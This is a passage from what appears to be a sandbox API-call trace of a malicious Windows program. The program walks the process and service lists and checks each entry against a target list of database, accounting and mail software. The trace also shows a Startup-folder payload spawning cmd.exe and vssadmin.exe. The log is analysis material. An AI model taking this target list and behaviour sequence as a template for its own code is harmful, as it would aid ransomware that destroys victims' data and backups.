(lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0045.518] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0045.518] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0045.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0045.519] lstrlenW (lpString="Winmgmt") returned 7 [0045.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0045.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0045.519] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0045.519] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0045.519] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0045.519] lstrlenW (lpString="WPDBusEnum") returned 10 [0045.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0045.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0045.519] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0045.519] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0045.519] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0045.519] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39406f0 | out: hHeap=0x600000) returned 1 [0045.519] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x164 [0045.521] Process32FirstW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0045.521] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0045.522] lstrlenW (lpString="System") returned 6 [0045.522] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0045.522] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0045.522] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0045.522] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0045.522] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0045.522] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0045.522] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0045.522] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0045.523] lstrlenW (lpString="smss.exe") returned 8 [0045.523] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0045.523] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0045.523] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0045.523] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0045.523] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0045.523] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0045.523] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0045.523] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0045.523] lstrlenW (lpString="csrss.exe") returned 9 [0045.523] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0045.523] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0045.523] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0045.523] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0045.523] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0045.523] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0045.524] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0045.524] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0045.524] lstrlenW (lpString="wininit.exe") returned 11 [0045.524] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0045.524] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0045.524] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0045.524] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0045.524] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0045.524] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0045.524] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0045.524] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0045.525] lstrlenW (lpString="csrss.exe") returned 9 [0045.525] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0045.525] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0045.528] lstrlenW (lpString="winlogon.exe") returned 12 [0045.528] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0045.528] lstrlenW (lpString="services.exe") returned 12 [0045.528] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0045.529] lstrlenW (lpString="lsass.exe") returned 9 [0045.529] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0045.530] lstrlenW (lpString="lsm.exe") returned 7 [0045.530] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.530] lstrlenW (lpString="svchost.exe") returned 11 [0045.530] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.531] lstrlenW (lpString="svchost.exe") returned 11 [0045.531] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.532] lstrlenW (lpString="svchost.exe") returned 11 [0045.532] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.532] lstrlenW (lpString="svchost.exe") returned 11 [0045.532] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.533] lstrlenW (lpString="svchost.exe") returned 11 [0045.533] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0045.533] lstrlenW (lpString="audiodg.exe") returned 11 [0045.534] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.534] lstrlenW (lpString="svchost.exe") returned 11 [0045.534] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.535] lstrlenW (lpString="svchost.exe") returned 11 [0045.535] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0045.535] lstrlenW (lpString="dwm.exe") returned 7 [0045.535] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0045.536] lstrlenW (lpString="explorer.exe") returned 12 [0045.536] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0045.537] lstrlenW (lpString="spoolsv.exe") returned 11 [0045.537] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0045.537] lstrlenW (lpString="taskhost.exe") returned 12 [0045.537] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.538] lstrlenW (lpString="svchost.exe") returned 11 [0045.538] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0045.538] lstrlenW (lpString="taskeng.exe") returned 11 [0045.539] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0045.539] lstrlenW (lpString="taskhost.exe") returned 12 [0045.539] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0045.540] lstrlenW (lpString="challenging.exe") returned 15 [0045.540] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0045.540] lstrlenW (lpString="pgp prix.exe") returned 12 [0045.540] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0045.541] lstrlenW (lpString="user-reno.exe") returned 13 [0045.541] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0045.542] lstrlenW (lpString="aggregate.exe") returned 13 [0045.542] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0045.542] lstrlenW (lpString="dressed.exe") returned 11 [0045.542] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0045.543] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0045.543] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0045.543] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0045.544] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0045.594] lstrlenW (lpString="developing.exe") returned 14 [0045.594] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0045.595] lstrlenW (lpString="supported.exe") returned 13 [0045.595] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0045.595] lstrlenW (lpString="girlstionselect.exe") returned 19 [0045.595] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0045.639] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0045.639] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0045.640] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0045.640] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0045.640] lstrlenW (lpString="eating.exe") returned 10 [0045.640] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0045.641] lstrlenW (lpString="nh_protected.exe") returned 16 [0045.641] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0045.641] lstrlenW (lpString="vulnerability.exe") returned 17 [0045.641] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0045.642] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0045.642] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0045.643] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0045.643] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0045.643] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0045.643] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0045.644] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0045.644] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0045.645] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0045.645] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0045.645] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0045.645] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0045.646] lstrlenW (lpString="cmd.exe") returned 7 [0045.646] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0045.646] lstrlenW (lpString="conhost.exe") returned 11 [0045.646] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0045.647] lstrlenW (lpString="vssadmin.exe") returned 12 [0045.647] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0045.648] lstrlenW (lpString="VSSVC.exe") returned 9 [0045.648] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0045.648] CloseHandle (hObject=0x164) returned 1 [0045.648] Sleep (dwMilliseconds=0x1f4) [0046.153] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6803a0 [0046.153] EnumServicesStatusExW (in: hSCManager=0x6803a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0046.154] GetLastError () returned 0xea [0046.154] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12c6) returned 0x3943b50 [0046.154] EnumServicesStatusExW (in: hSCManager=0x6803a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3943b50, cbBufSize=0x12c6, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3943b50, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0046.155] CloseServiceHandle (hSCObject=0x6803a0) returned 1 [0046.155] lstrlenW (lpString="Appinfo") returned 7 [0046.155] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0046.155] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0046.155] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0046.155] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0046.155] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0046.155] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0046.155] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0046.155] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0046.155] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0046.155] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0046.155] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0046.155] lstrlenW (lpString="AudioSrv") returned 8 [0046.155] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0046.155] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0046.156] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0046.156] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0046.156] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0046.156] lstrlenW (lpString="BFE") returned 3 [0046.156] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0046.156] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0046.156] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0046.156] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0046.156] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0046.156] lstrlenW (lpString="CryptSvc") returned 8 [0046.156] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0046.156] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0046.156] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0046.156] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0046.156] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0046.156] lstrlenW (lpString="CscService") returned 10 [0046.156] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0046.156] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0046.156] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0046.156] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0046.156] lstrcmpiW 